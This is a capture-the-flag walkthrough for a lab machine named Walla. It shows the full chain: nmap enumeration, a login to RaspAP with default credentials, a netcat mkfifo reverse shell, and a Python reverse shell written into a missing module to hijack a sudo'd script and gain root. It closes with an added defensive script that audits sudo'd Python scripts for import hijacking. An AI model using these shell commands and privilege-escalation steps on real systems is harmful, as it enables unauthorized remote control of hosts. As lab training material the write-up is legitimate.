🐧Walla

IP: 192.168.116.97

Enumeration

Nmap scan

nmap -p- 192.168.116.97 -sV -A

The only port that stands out on this machine is 8091. Found that this page is running RaspAP. A quick Google search for RaspAP default credentials got me into the site: admin:secret.

Found a nice console😈

Shell

Tried a few shells and one came through.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.49.116 4444 >/tmp/f

Dropped LinPEAS on this machine and ran it. Found an interesting service we can edit.

Added a reverse shell script so that when the service was run it would spawn a shell, but there was no way to reboot the machine or restart the service.

Sudo -l

wifi_reset.py is missing the wificontroller.py module.

Made the module. Echoed a reverse shell into wificontroller.py:

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.116",6699));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")' > wificontroller.py

Ran script.

sudo /usr/bin/python /home/walter/wifi_reset.py

Root
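
The root cause above is a sudo rule that runs a Python script from a directory the user controls, so Python resolves the script's imports from that directory first. The following audit check is an added example, not part of the original writeup or of RaspAP: it lists the imports of such a script that its own directory could supply. The function names, the `trusted_uids` parameter and the sample script contents are assumptions, and the script is assumed to parse as Python 3.

```python
import ast
import importlib.util
import os
import stat
import sys
import tempfile

def dir_is_untrusted(path, trusted_uids=frozenset({0})):
    """True if an account outside trusted_uids can create files in path."""
    st = os.stat(path)
    loose_mode = bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))
    return st.st_uid not in trusted_uids or loose_mode

def imported_modules(script):
    """Top-level module names imported anywhere in the script."""
    with open(script) as fh:
        tree = ast.parse(fh.read(), filename=script)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return names

def audit_script(script, trusted_uids=frozenset({0})):
    """Return {module: status} for imports the script's directory could supply."""
    script_dir = os.path.dirname(os.path.abspath(script))
    if not dir_is_untrusted(script_dir, trusted_uids):
        return {}
    findings = {}
    for name in sorted(imported_modules(script)):
        if name in sys.builtin_module_names:
            continue  # built-ins are resolved before sys.path is consulted
        base = os.path.join(script_dir, name)
        if os.path.exists(base + ".py") or os.path.isdir(base):
            findings[name] = "local"        # already loaded from the script dir
        elif importlib.util.find_spec(name) is None:
            findings[name] = "missing"      # any file with this name would be loaded
        else:
            # Script dir precedes stdlib/site-packages on sys.path; modules the
            # interpreter preloads at startup (e.g. os) are the exception.
            findings[name] = "shadowable"
    return findings

def make_sample(dir_mode):
    """Constructed stand-in for /home/walter/wifi_reset.py (contents assumed)."""
    script = os.path.join(tempfile.mkdtemp(), "wifi_reset.py")
    with open(script, "w") as fh:
        fh.write("import sys\nimport wificontroller\n")
    os.chmod(os.path.dirname(script), dir_mode)
    return script
```

An empty result means the script directory is owned by a trusted account and is not group- or world-writable; any finding means the sudo rule should point at a root-owned path instead.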
